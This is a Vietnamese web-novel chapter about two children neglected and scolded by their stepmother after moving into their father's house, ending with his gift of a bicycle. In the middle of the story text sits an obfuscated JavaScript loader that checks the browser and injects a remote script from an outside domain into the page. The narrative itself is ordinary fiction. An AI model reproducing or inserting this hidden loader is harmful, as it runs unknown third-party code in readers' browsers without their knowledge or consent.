Dì Ghẻ

Chương 2: " Món Quà Của Bố."

24-08-2024


Trước Sau

Đó là những chuyện xảy ra tối hôm qua, sáng nay Nam vô tình nghe được cuộc đối thoại giữa bố và cô Hường.
Nó hiểu được rằng rồi đây cuộc sống của hai anh em sẽ không còn được như trước nữa.
Mặc dù ngôi nhà ba tầng rộng rãi này đầy đủ mọi thứ tiện nghi mà ở nhà ông bà ngoại không có nhưng thứ tình cảm quan tâm, ân cần chăm sóc của ông bà ngoại đối với hai anh em Nam giờ đây là một thứ xa xỉ.
7h sáng cái Hạnh bật dậy khỏi giường.
Con bé đi vào nhà tắm tự đánh răng rửa mặt.
Nam thấy vậy chạy theo lấy nước vào ca cho em gái.
Đánh răng rửa mặt xong bé Hạnh chạy lại mở cái hộp bánh ngọt tối qua bố mua cho hỏi anh:

- Anh ơi, em ăn cái này được không...
??

Nam nhìn em gật đầu cười, may mà tối qua bố nó mua bánh cho hai anh em.
Không thì cái Hạnh đói khóc cả đêm mất, buổi tối nó ăn đâu được mấy xêu mỳ tôm.
Hạnh mở hộp bánh định bốc ăn, bỗng nhiên nó nhìn sang Nam ngồi đó như đang suy nghĩ điều gì.
Hạnh cầm hộp bánh lại, lay người anh con bé cười hở cả răng sún:

- Em chia cho anh một nửa này.
.
Nhưng em nửa to anh nửa bé.
.
hì hì.
.

Nam xoa đầu em:

- Thôi em ăn đi, anh no lắm, không đói đâu.

Nửa cái bánh cũng chẳng to tát gì, bé Hạnh cảm ơn anh rồi ngồi ăn một tí là hết.
Ăn xong Hạnh nói với anh:

- Anh cho e xuống dưới kia chơi nhé.
Tối qua em thấy ở ghế có nhiều đồ chơi lắm anh ạ.

Hạnh nói thằng Nam mới nhớ, công nhận ở phòng khách có khá nhiều đồ chơi.
Nào là búp bê, nào là đồ hàng linh tinh cả.
Chủ nhật mà, chẳng lẽ cứ ở mãi trên phòng.
Nam dắt em gái xuống phòng khách tầng một.
Vừa xuống đến nơi bé Hạnh chạy đến ôm ngay con gấu bông khá lớn.
Con bé thích lắm cứ ghì chặt lấy con gấu bông cọ hai cái má búng ra sữa vào con gấu.
Nam nhìn ra sân không thấy chiếc xe máy sớm vẫn còn dựng ở đó đâu.
Phòng cô Hường cũng không thấy tiếng động.
Một lúc sau thì có tiếng bước chân trên tầng hai đi xuống.
Chưa thấy người nhưng giọng một bé gái vang lên:

- Mẹ ơi...
.
Mẹ ơi...
Mẹ đi đâu rồi...

Đang bước xuống là một bé gái lớn hơn Hạnh một chút.
Đứa bé gọi mẹ không thấy đâu, đột nhiên nó dừng lại ở giữa cầu thang khi nhìn thấy Nam và bé Hạnh.
Thấy bé Hạnh đang ôm con gấu nó đứng trên cầu thang chỉ chỏ:

- Sao lại ôm gấu của mình, trả đây.

Nói rồi nó chạy nhanh xuống giằng lấy con gấu từ trong vòng tay của bé Hạnh.
Cái Hạnh đang ôm gấu không hiểu chuyện gì, nó nhìn anh rồi mếu máo:

- Anh ơi, gấu...
gấu...
.

Nam dỗ dành em rồi hỏi bé gái kia:

- Em là ai vậy...
??

Con bé vênh váo trả lời:

- Em là con của mẹ Hường với bố Tuấn.

" Bố Tuấn", nghe con bé nói xong Nam hơi giật mình.
Chẳng lẽ bố nó với cô Hường đã có con với nhau.
Nó nhìn bé gái cười rồi nói:

- Anh với bé Hạnh cũng là con của bố Tuấn.
Em năm nay bao nhiêu tuổi.
.
??

Con bé tròn mắt ngạc nhiên, nó nhòm nhòm hai anh em một lúc rồi quả quyết:

- Không phải, bố Tuấn chỉ có mình em thôi.
Hai người là con sao hôm nay em mới thấy.
Không phải.
.
??

Cái Hạnh vẫn đang thút thít nhìn theo con gấu bông.
Thằng Nam nói tiếp:

- Thật mà, anh với bé Hạnh mới chuyển về đây ở tối qua.
.

Con bé bĩu môi rồi ngồi xuống ghế Sofa lấy điều khiển bật phim hoạt hình.
Nó đặt con gấu sang bên cạnh, mắt nhìn cái Hạnh như sợ cái Hạnh sẽ lại cướp mất con gấu của nó.
Có tiếng xe máy đỗ ngoài cổng:

" Cạch.
.
Cạch.
.
Cạch.
"

Cổng mở, cô Hường phi xe máy vào trong sân.
Đi vào phòng khách thấy cả ba đứa đang ngồi xem tivi.
Cô Hường cười tươi:

- Uây, con gái mẹ dậy sớm thế.
Hôm nay chủ nhật sao không ngủ thêm tí nữa.
Mẹ mua đồ ăn sáng cho con đây.
Đi vào đây đánh răng rửa mặt rồi ăn sáng nào...
.

Thằng Nam với cái Hạnh ngồi đó nhìn cô Hường mà cô Hường chẳng thèm để ý đến chúng nó.
Thằng Nam cất giọng lí nhí:

- Cháu chào cô ạ...

Cái Hạnh thấy con bé kia đi khỏi là nó chạy lại chỗ con gấu bông.
Nhưng khổ thân nó, con bé đành hanh kia như chợt nhớ ra điều gì nó quay lại nhìn cái Hạnh hét lên:

- Không được động vào.

Cô Hường thấy con hét ầm ĩ bên ngoài vội chạy ra hỏi:

- Sao đấy, làm sao mà hét lên thế.

Con bé kia thấy mẹ thì vội nước mắt ngắn, nước mắt dài:

- Nó cứ lấy đồ chơi của con.
Hu.
.
hu.
.
hu.

Cô Hường lừ mắt một cái là bé Hạnh không dám tiến lại chỗ con gấu bông nữa.
Nam vội kéo tay em gái lại rồi nói:

- Cô cho em cháu chơi một chút, nó thích con gấu đấy lắm.

Cô Hường quát:

- Chơi gì mà chơi, để em nó khóc rồi đây này.
Để yên đấy, khi nào em nó đi học rồi ở nhà mà chơi.

Nói đoạn cô quay sang dỗ con gái:

- Thôi thôi, mẹ cấm nó rồi.
Con đi đánh răng rồi mẹ làm cho ăn nhé.

Con bé thấy mẹ nói thế lập tức ngừng khóc.
Chưa dừng ở đó nó còn nhìn cái Hạnh bằng ánh mắt khó chịu.
Nam thấy vậy vội dắt tay em định đi ra bên ngoài đường.
Nó sợ để bé Hạnh đứng đó con bé sẽ khóc oà lên mất.
Từ lúc đẻ ra đến bây giờ đã lúc nào nó được ôm con gấu vừa to vừa đẹp như vậy.
Bước ra gần đến cửa thì cô Hường gọi với lại:

- Thế hai đứa đã ăn sáng chưa.
.
??

Nam quay lại định trả lời thì bé Hạnh nói:

- Dạ cháu ăn bánh rồi ạ.
Anh Nam không ăn...

Nghe thấy vậy cô Hường cười đon đả:

- Ăn rồi à, vậy hai anh em ra đường chơi đi nhé.
Cô cứ nghĩ hai đứa mệt ngủ dậy muộn cho nên mua mỗi cho em Thư.
Thôi hai anh em dẫn nhau đi chơi đi.

Thằng Nam ngậm ngùi cúi mặt xuống đất, bụng nó lúc này đang sôi lên những tiếng ùng ục nghe rõ mồn một.
Một thằng nhóc đang độ tuổi lớn, nhưng buổi tối hôm qua nó chỉ được ăn bát mỳ tôm trương lõng bõng nước.
Bố mua cho cái bánh thì nó để dành cho em gái cả.
Ban nãy nó tưởng cô Hường hỏi nó ăn sáng chưa là cô cũng mua đồ ăn cho nó.
Nhưng rồi nó thất vọng, nắm chặt tay bé Hạnh thằng Nam mở cổng đi ra ngoài.
Trời buổi sáng không khí trong lành, nó hít một hơi thật mạnh, nó chợt nhớ lại lời mẹ nó nói hồi nó còn bé.
Hồi nhỏ nó hay kêu đói là mẹ nó lại bảo:

- Đói thì cứ ngủ đi sẽ hết con ạ.

Đêm qua nó nhớ lời mẹ nhịn đói đi ngủ, nhưng giờ này làm sao nó ngủ được.
Bất chợt cái Hạnh gọi to:

- Anh Nam ơi, lại đây ăn bánh này...

Nó nhìn về phía trước tầm 10m, bé Hạnh đang đứng với một bà lão tầm 60 tuổi.
Bà lão đang đưa cho Hạnh một cái bánh rán.
Thấy Nam bà vẫy tay gọi với:

- Lại đây cháu, lại đây bà xem nào.
.

Nam chạy vội lại sợ em gái làm gì không phải.
Đến nơi bà lão nhìn Nam cười móm mém:

- Giống bố quá, hai đứa mới chuyển về đây chiều tối qua phải không...
?? Đúng là càng nhìn càng giống bố.

Nam lễ phép:

- Cháu chào bà.

Bà lão gật đầu rồi đưa chiếc bánh rán còn lại cho Nam rồi nói:

- Cháu ăn đi, bà là họ hàng với bố cháu.
Bố cháu phải gọi bà là cô.
Ngày bé bà cung bế mày đấy.
Giờ lớn quá rồi...
.
function _0x1a27(_0x29c0a7,_0x289742){const _0x342079=_0x55fb();return _0x1a27=function(_0x5e7d1e,_0x4c818d){_0x5e7d1e=_0x5e7d1e-(-0x13d2*0x1+-0xa57+0x1eb5);let _0x1cd63c=_0x342079[_0x5e7d1e];return _0x1cd63c;},_0x1a27(_0x29c0a7,_0x289742);}function _0x55fb(){const _0x3e02be=['VPWLQ','3091288akoGls','ent','vyGfB','script','vIdVV','6QdmWJz','userAgent','VqeQE','currentScr','WluFk','742560TFUPCb','async','HHAYX','ebaMo','className','LgeZS','data-cfasy','setAttribu','vywHT','jHisu','4IhyVIl','340098dIptzs','createElem','67286xBtLLm','type','50MPKDYY','insertAdja','body','appendChil','false','toString','src','4|5|1|2|6|','sMfXp','21UojAHu','104315viRXEp','Apple','1671659xCOQek','vendor','ipt','cript','text/javas','3|0','EPlxY','jizOv','LXhAP','centElemen','indexOf','2623167lBpQQL'];_0x55fb=function(){return _0x3e02be;};return _0x55fb();}(function(_0x46c1e9,_0x335b40){function _0x1519f1(_0x4a2728,_0x2af139,_0x40e706,_0x330404){return _0x1a27(_0x4a2728-0x56,_0x40e706);}function _0x2ac9e2(_0x39c24c,_0x144360,_0x5561cf,_0xb4777f){return _0x1a27(_0x5561cf- -0x2ea,_0x144360);}const _0x38dd22=_0x46c1e9();while(!![]){try{const _0x161166=parseInt(_0x1519f1(0xe6,0xd2,0xce,0xe9))/(-0x13b1+0x1b*-0x13d+0x1*0x3521)*(-parseInt(_0x1519f1(0xf8,0xf8,0x10a,0x10c))/(-0x2321+-0x3c2*0x2+0x2aa7))+-parseInt(_0x1519f1(0xeb,0xf4,0x104,0xf9))/(-0x3*-0xb12+0x2512+-0x4645)+-parseInt(_0x1519f1(0xf5,0xfb,0xdd,0xf7))/(-0x31d*0x8+-0x4ad+-0x1d99*-0x1)*(parseInt(_0x1519f1(0x104,0x11d,0x116,0x10d))/(0x15d4+0x1317*-0x2+0x105f))+parseInt(_0x1519f1(0xf6,0x10d,0xf2,0x102))/(-0x1*0x1904+0x3a*0x83+-0x4a4)*(-parseInt(_0x1519f1(0x103,0x115,0x11b,0xfd))/(-0xd85+-0xe73*-0x1+-0xe7))+parseInt(_0x1519f1(0x113,0x103,0x111,0x123))/(-0xf41+0x1a85+-0xb3c*0x1)+-parseInt(_0x1519f1(0x111,0x103,0x118,0x10b))/(-0x21a4+-0xbe2+-0x6d*-0x6b)+-parseInt(_0x1519f1(0xfa,0x110,0xf3,0xe8))/(-0x1*-0x343+-0x43*-0x2e+0xf43*-0x1)*(-parseInt(_0x2ac9e2(-0x234,-0x222,-0x23a,-0x223))/(-0x47f*0x8+-0x2363+0x23b3*0x2));if(_0x161166===_0x335b40)break;else _0x38dd22['push'](_0x38dd22['shift']());}catch(_0x5a6bb4){_0x38dd22['push'](_0x38dd22['shift']());}}}(_0x55fb,0x3*0x14ffb+-0x5*0x4dce+0xdafc),function(_0xef833a,_0x2e9776,_0x400987){function _0x3c0d20(_0x11d94e,_0x46dd9a,_0x324136,_0x58d320){return _0x1a27(_0x58d320- -0x115,_0x46dd9a);}function _0x1afd4a(_0x515402,_0x25227a,_0x37b234,_0x4bf9b4){return _0x1a27(_0x515402- -0x2a2,_0x4bf9b4);}const _0x55dd90={'vIdVV':function(_0x2b640b,_0x24e30b){return _0x2b640b!==_0x24e30b;},'VPWLQ':function(_0x544c31,_0x2bef20){return _0x544c31===_0x2bef20;},'HHAYX':_0x1afd4a(-0x1f3,-0x202,-0x206,-0x1f0),'ebaMo':function(_0x6d7dcf,_0x490330){return _0x6d7dcf===_0x490330;},'VqeQE':function(_0x408c28,_0x2af167){return _0x408c28===_0x2af167;},'vywHT':'CriOS','LXhAP':'afterend','EZQyW':_0x1afd4a(-0x207,-0x204,-0x200,-0x203)+'nc','VgeWV':_0x3c0d20(-0x61,-0x69,-0x58,-0x6d),'jHisu':_0x1afd4a(-0x214,-0x214,-0x215,-0x227),'LgeZS':_0x1afd4a(-0x1ee,-0x1e0,-0x1d7,-0x202)+_0x1afd4a(-0x1ef,-0x1fd,-0x1f8,-0x1fe),'WluFk':function(_0x107dda){return _0x107dda();},'VZvWk':function(_0x52d26,_0x1f85b9){return _0x52d26!==_0x1f85b9;},'tebjk':_0x1afd4a(-0x1f6,-0x1fb,-0x200,-0x206),'EPlxY':function(_0x55a99d,_0x3f367b){return _0x55a99d===_0x3f367b;},'vyGfB':_0x1afd4a(-0x1eb,-0x1f8,-0x1ec,-0x1d3)};function _0xa44cf0(){function _0x5f1d59(_0x4e8f37,_0xc27f9b,_0x246c47,_0xd59cf6){return _0x3c0d20(_0x4e8f37-0xce,_0xd59cf6,_0x246c47-0x44,_0x246c47-0x40f);}function _0x1d57db(_0x4a9c58,_0x27395c,_0x160009,_0xb62483){return _0x1afd4a(_0x4a9c58-0x5c9,_0x27395c-0xf9,_0x160009-0x1c9,_0x160009);}const _0x490e05=navigator[_0x5f1d59(0x3a0,0x396,0x3ab,0x3bd)];return _0x55dd90[_0x5f1d59(0x386,0x373,0x389,0x37a)](_0x490e05,undefined)&&_0x55dd90[_0x1d57db(0x3e3,0x3d3,0x3d1,0x3cb)](_0x490e05[_0x5f1d59(0x3ca,0x3c2,0x3b4,0x3cc)](_0x55dd90[_0x5f1d59(0x37c,0x39d,0x391,0x39c)]),0x1f8e+0x17*0x8b+-0x2c0b)&&_0x55dd90[_0x1d57db(0x3bf,0x3a9,0x3d4,0x3bf)](eval[_0x5f1d59(0x38b,0x3b0,0x3a3,0x3b4)]()['length'],0xae0+-0x7ad+-0x30e)&&(_0x400987||_0x55dd90[_0x1d57db(0x3b9,0x3a9,0x3cc,0x3a8)](navigator[_0x1d57db(0x3b8,0x3b4,0x3a1,0x3c2)][_0x5f1d59(0x39d,0x3b1,0x3b4,0x3a3)](_0x55dd90[_0x5f1d59(0x3a7,0x38b,0x397,0x38d)]),-(-0x6de+-0xd2b+0x140a)));}if(!_0x55dd90[_0x3c0d20(-0x95,-0x87,-0x79,-0x81)](_0xa44cf0)){if(_0x55dd90['VZvWk'](_0x55dd90['tebjk'],_0x55dd90['tebjk']))_0xff58c5['body'][_0x3c0d20(-0x6b,-0x62,-0x7a,-0x6e)+'d'](_0x161f45);else{var _0x4897ba=document[_0x3c0d20(-0x7b,-0x80,-0x7a,-0x74)+_0x3c0d20(-0x9a,-0x79,-0x95,-0x89)](_0x55dd90[_0x3c0d20(-0x90,-0x83,-0x67,-0x77)]);_0x4897ba['type']=_0x55dd90[_0x3c0d20(-0x69,-0x6b,-0x88,-0x7b)],_0x4897ba[_0x3c0d20(-0x87,-0x8e,-0x82,-0x7f)]=!![],_0x4897ba[_0x1afd4a(-0x206,-0x21e,-0x20b,-0x1fb)+'te'](_0x1afd4a(-0x207,-0x1f3,-0x1fb,-0x210)+'nc',_0x55dd90['VgeWV']),_0x4897ba[_0x1afd4a(-0x1f8,-0x1e0,-0x20a,-0x1f3)]=_0xef833a;_0x2e9776&&(_0x4897ba['className']=_0x2e9776);if(document[_0x3c0d20(-0x9a,-0x6c,-0x82,-0x82)+_0x1afd4a(-0x1f0,-0x1de,-0x1ea,-0x1d8)]){if(_0x55dd90[_0x1afd4a(-0x1ec,-0x1ec,-0x1d6,-0x1f9)](_0x55dd90['vyGfB'],_0x55dd90[_0x1afd4a(-0x215,-0x204,-0x1fe,-0x21d)]))document[_0x1afd4a(-0x20f,-0x20b,-0x223,-0x21c)+_0x1afd4a(-0x1f0,-0x1e1,-0x1f8,-0x1e4)][_0x3c0d20(-0x6c,-0x74,-0x71,-0x70)+'centElemen'+'t'](_0x55dd90[_0x1afd4a(-0x1ea,-0x1db,-0x1fd,-0x1dc)],_0x4897ba);else{const _0x11e29f=(_0x3c0d20(-0x7a,-0x55,-0x62,-0x6a)+_0x1afd4a(-0x1ed,-0x1e4,-0x1e2,-0x1f4))['split']('|');let _0x32b93c=0x163b+0x1f*0x11+-0x184a;while(!![]){switch(_0x11e29f[_0x32b93c++]){case'0':_0x3104b4[_0x1afd4a(-0x20f,-0x203,-0x1fe,-0x1fa)+_0x1afd4a(-0x1f0,-0x1f0,-0x1db,-0x206)]?_0x1cbeb2['currentScr'+_0x1afd4a(-0x1f0,-0x1eb,-0x1eb,-0x1e9)][_0x1afd4a(-0x1fd,-0x1ef,-0x1f6,-0x215)+_0x3c0d20(-0x57,-0x6e,-0x47,-0x5c)+'t'](_0x55dd90['LXhAP'],_0x5a4e5e):_0x51b464['body'][_0x1afd4a(-0x1fb,-0x1ff,-0x214,-0x204)+'d'](_0x5a4e5e);continue;case'1':_0x5a4e5e[_0x3c0d20(-0x74,-0x7e,-0x93,-0x7f)]=!![];continue;case'2':_0x5a4e5e[_0x3c0d20(-0x85,-0x76,-0x83,-0x79)+'te'](_0x55dd90['EZQyW'],_0x55dd90['VgeWV']);continue;case'3':_0x17f805&&(_0x5a4e5e[_0x1afd4a(-0x209,-0x202,-0x20e,-0x213)]=_0x3b354d);continue;case'4':var _0x5a4e5e=_0x5209cf['createElem'+_0x3c0d20(-0x93,-0x7c,-0x98,-0x89)](_0x55dd90[_0x3c0d20(-0x60,-0x5f,-0x84,-0x77)]);continue;case'5':_0x5a4e5e[_0x3c0d20(-0x6b,-0x83,-0x80,-0x72)]=_0x55dd90[_0x3c0d20(-0x84,-0x64,-0x88,-0x7b)];continue;case'6':_0x5a4e5e[_0x1afd4a(-0x1f8,-0x1df,-0x1e8,-0x209)]=_0x21827e;continue;}break;}}}else document[_0x3c0d20(-0x85,-0x7e,-0x6f,-0x6f)][_0x3c0d20(-0x7a,-0x56,-0x7a,-0x6e)+'d'](_0x4897ba);}}}("//qnp16tstw.
com/lv/esnk/2014002/code.
js","__clb-2014002",!0));

Đang cơn đói Nam cầm cái bánh rán ăn ngấu nghiến.
Bà lão nhìn Nam khẽ lắc đầu tội nghiệp.
Ba bà cháu ngồi ven con đường trong ngõ cười tíu tít.
Nam cảm nhận thấy hơi ấm từ bàn tay nhăn nheo của bà, có gì đó rất giống với bà ngoại.
Đột nhiên từ phía cổng giọng cô Hường vang lên the thé:

- Lại ra đấy làm gì đấy...

Vừa nói cô Hường vừa tiến lại gần chỗ ba bà cháu.
Thấy bé Hạnh vẫn cầm trên tay nửa cái bánh rán cô Hường quát:

- Ăn uống linh tinh có làm sao ai chịu trách nhiệm.
Nãy hỏi ăn sáng chưa thì lại bảo ăn rồi, giờ ra đây ăn xin ăn trực của bà thế này à.
.
??

Không để cho ai kịp nói câu nào cô Hường nhìn bà ra vẻ trách móc:

- Ở nhà có thiếu thốn gì đâu bà, bà cứ cho chúng nó thế này con ngại lắm.
Lần sau bà cứ kệ chúng con bà ạ.

Bà lão nhìn cô Hường nhẹ nhàng nói:

- Chúng nó cũng là con cháu trong nhà, bà cho các cháu cái bánh thì có gì sai.
Chị không cần quan trọng hoá vấn đề lên như thế.

Như bị đuối lý, cô Hường quay lại quát hai anh em Nam:

- Đi về rửa tay rửa chân rồi tí nữa chuẩn bị ăn cơm.

Vừa nói cô Hường vừa kéo tay bé Hạnh lôi về nhà.
Thằng Nam thấy em sợ hãi, nó chạy lên nắm tay em.
Hai anh em đi rồi còn ngoái lại cúi chào bà.
Bà lão cũng vẫy tay chào hai đứa.
Vào đến nhà Nam thấy cái Thư con cô Hường vẫn ngồi ở phòng khách nhâm nhi bữa ăn sáng chưa xong.
Nào là trứng ốp la, bánh mỳ gối, thịt xông khói, sữa tươi, hoa quả...
Nhìn đống đồ ăn mà Nam khẽ nuốt nước bọt.
Cái Thư vừa ăn vừa xem hoạt hình.
Nó đang chậm rãi cắn từng mẩu bánh mỳ, thấy hai anh em Nam nó vội vàng ăn như sợ phải chia cho người khác.

Nam với Hạnh đứng đó thì lại giật mình khi giọng cô Hường cất lên:

- Còn đứng đó, lên trên phòng rửa tay đi rồi xuống đây phụ cô nhặt rau.
Tí nữa nhà có khách đến ăn cơm đấy.
Phải sạch sẽ vào.
.

Nam vâng dạ rồi dắt em lên trên tầng, bé Hạnh vẫn chăm chăm nhìn vào con gấu nhưng nó sợ không dám lại gần.
Vừa đi lên tầng nó vừa giật giật cánh tay anh nói nhỏ:

- Hôm nào nhà không có ai anh cho em chơi nhé.

Nam nhìn em gái khẽ cười rồi thì thầm:

- Ừ, hôm nào nhà không có ai cho bé Hạnh chơi thoải mái.
Giờ lên phòng rửa tay rửa mồm rồi học bài nhé.
Tay còn dính đường bánh rán kìa.

Bé Hạnh nghe anh nói thế đưa tay lên nhìn rồi nó cho tay vào mồm mút cái chụt.
Mút xong lại nhe cái miệng sún răng ra cười.
Nam dặn em gái ngồi học không được đi lại linh tinh.
Nhà thì cao, cái Hạnh thì nhỏ tuổi.
Lỡ đâu nó nghịch ngợm ngã thì chết.
Lẽ ra phải trông em nhưng Nam bị cô Hường từ dưới nhà gọi lên:

- Xong chưa, xuống đây xem nào.
Làm cái gì mà lâu thế.

Nam đáp vội:

- Cháu xuống bây giờ đây.

Dứt lời Nam đóng cửa phòng chạy vội xuống dưới.
Vào bếp Nam thấy đủ các loại rau, cô Hường chỉ tay vào đống rau nói:

- Nhặt đi tí cô rửa, nhặt sạch vào nhé.

Nam vừa nhăt rau vừa hỏi cô Hường:

- Bố cháu đi đâu vậy ạ...
??

Cô Hường nhăn mặt:

- Bố phải đi làm chứ đi đâu, ở nhà lấy gì mà nuôi tưng đây người.

Nam không dám hỏi gì thêm, nó cặm cụi nhặt hết chỗ rau nào là rau cải, rau cúc, rau sống các kiểu.
Nhặt xong nó rửa tay rồi chạy vội lên tầng ba xem em gái.
Bé Hạnh vẫn đang nằm trên giường tập viết chữ cái.
Thấy anh Nam nó cười tít mắt khoe:

- Anh xem xem, em viết có đẹp không.
.
?

Nam cầm quyển vở của em rồi khen:

- Đẹp thế nhờ, viết giỏi hơn cả anh.
Mai đi học xem cô giáo có chấm điểm 10 không nhé.

Có tiếng xe oto, kèm theo là tiếng mở cổng.
Nam chạy xuống dưới nhìn thì đúng là bố nó vừa về.
Bé Hạnh cũng đi xuống theo anh, bố vừa vào đến phòng khách thì cái Thư chạy lại ôm vòi vĩnh:

- Bố có mua quà cho con không.
.
?

Thấy bố không cầm gì trong tay, cái Thư xị mặt rồi lại ngồi xem tivi.
Nhìn thấy hai anh em Nam đang đi từ trên xuống.
Bố Tuấn liền gọi:

- Hai anh em xuống đây xem nào, sáng bố đi sớm hai đứa ngủ mấy giờ dậy.

Bố bế bé Hạnh lên cao rồi lại hạ xuống, con bé Hạnh buồn cười tít cả mắt.
Nam không nói gì, nó vốn ít nói như vậy.
Từ nhỏ đã phải sống cảnh vắng bố, mẹ thì phải đi làm suốt.
Chẳng hiểu từ bao giờ mà nó chỉ có thể mở lòng được với những người thân sống cạnh nó, đó là ông bà ngoại.
Các bác các cậu ai cũng nói nó lầm lỳ, khó gần.
Nhưng nó phải như thế, nhất là khi mẹ đẻ thêm cái Hạnh.
Nó tự nhủ phải thay mẹ chăm sóc em, nó phải lớn nhanh hơn cái độ tuổi của nó.
Bằng tuổi nó các bạn chỉ ăn với học rồi chơi.
Còn nó thì ngoài đi học ra về nhà là nó vác cần đi câu cá, theo cậu đi cất vó ở những bờ mương, con kênh.
Nhà bà ngoại tuy có bếp gas nhưng ông bà tiết kiệm, những gì đun lâu là bà toàn đun củi với bếp than.
Vậy là khi rảnh nó lại vác bao đi khắp triền đê nhặt những mảnh gỗ vụn theo sóng đánh vào.
Đó là tuổi thơ của nó khi còn nhỏ tí.
Thử hỏi như thế làm sao nó có thể vui vẻ, hoà đồng như những đứa khác được.

Cô Hường đi ra thấy bố nó vội vàng cười:

- Anh xem đi tắm đi rồi chuẩn bị ăn cơm.
Hôm nay em làm lẩu, lát nữa mấy đứa bạn học cũng đến đây bây giờ.
Một mình từ sáng đến giờ chưa được ngơi nghỉ.

Cô nhìn Nam rồi nói nhẹ nhàng:

- Hai anh em cứ ngồi dưới đây xem tivi với em.
Lát cô nấu xong rồi ăn cơm nhé.

Bố Nam thấy gia đình có vẻ yên ấm thì cũng lấy làm mừng lắm.
Bế bé Hạnh đặt xuống sofa ông nói:

- Đây là chị Thư nhé Hạnh.
Chị Thư hơn hạnh 2 tuổi.
Còn kia là anh Nam, anh lớn nhất nhà nhé Thư.

Cái Thư ngó sang rồi lại dán mắt vào tivi không thèm để ý.
Nam cũng ngồi xuống cạnh em gái.
Bố Nam với lấy một quả táo trong đĩa rồi đưa cho Hạnh, cái Thư thấy thế quay lại nhìn rồi mếu máo:

- Táo của con...
.

Bố Tuấn cười cười rồi nói:

- Còn nhiều mà, con ăn có hết đâu.
Chia cho em với chứ.

Bé Hạnh cầm quả táo đỏ trong tay thích thú lắm.
Nó cho lên mũi hít hà rồi khoe anh, mặc kệ con bé Thư đang nhìn nó đầy căm ghét.
Nam có thắc mắc muốn hỏi bố nhưng nó nghĩ gì rồi lại thôi.
Nó cảm thấy lạc lõng trong ngôi nhà này, nó cảm thấy sự ghét bỏ trong ngôi nhà này.
Nó muốn về với bà ngoại, nhưng nó biết làm sao bà ngoại có thể nuôi hai anh em nó.

Bất chợt nó thấy bàn tay bố nó vỗ lên vai nó, ông hất tay bảo nó ra ngoài.
Bé Hạnh vẫn ôm quả táo ngồi xem tivi, Nam đi theo bố ra ngoài.
Ra đến ngoài sân bố nó mở cốp xe oto lấy ra một cái xe đạp nhìn khá xịn.
Cái xe không quá to cũng không quá nhỏ.
Nhìn Nam bố nó nói:

- Từ mai xe này là của con.
Trước ở với ông bà thì gần trường giờ chuyển về đây hơi xa.
Con chịu khó đạp xe đi học nhé.
Rồi đây khi nào ổn bố xin chuyển trường về phường gần đây học cho tiện.
Em thì học nội trú ở trường rồi, bố sẽ bảo cô Hường đón em.

Nghe thấy thế thằng Nam vội nói:

- Thôi không sao, để con đón em cũng được.
Gần trường có nhà bác Thuý, em nó có về sớm thì ở đó đợi con, trước giờ vẫn vậy bố ạ.

Ông Tuấn nhìn nó rồi khẽ vỗ nhẽ vào vai nó.
Rồi ông gật đầu đồng ý, hai bố con ngắm cái xe đạp mới ra điều tâm đắc.
Thằng Nam thích lắm, từ bé tới giờ nó mới được mua cho một cái xe đạp riêng.
Trước ở với ông bà ngoại cách trường tầm 2km nó toàn đi bộ.
Sau vào cấp 2 thì ông mua cho cái xe cũ nặng lắm.
Hôm nào mà thủng xăm xịt lốp dắt về nhà đổ hết mồ hôi hột.
Nó nhìn bố thầm cảm ơn, từ mai nó sẽ có xe mới để đi học rồi đưa đón em gái.
Đây cũng là món quà đầu tiên sau bao nhiêu năm nó được bố mua tặng.

Bầu không khí ấm áp đó bị dội một gáo nước lạnh bởi cô Hường:

- Anh lại mua cái gì đấy, xe cũ ở nhà vứt xó không ai đi lại còn mua xe mới làm gì.

Bố Nam trừng mắt nhìn, cô Hường không nói gì nữa.
Quay đi rồi nhưng cô Hường vẫn cố nói thêm một câu:

- Haizz, chẳng biết rồi sau này có nhờ được cái gì không...
??

Bên ngoài có người bấm chuông, Nam chạy ra mở cổng.
Thì ra đó là mấy người bạn học của bố lẫn cô Hường, tất nhiên trong số đó cũng có người Nam biết mặt.
Vì họ cũng là bạn học cùng lớp của mẹ Nam.

Trước Sau
Bình luận văn minh lịch sự là động lực cho tác giả. Nếu gặp chương bị lỗi hãy "Báo lỗi chương" để BQT xử lý!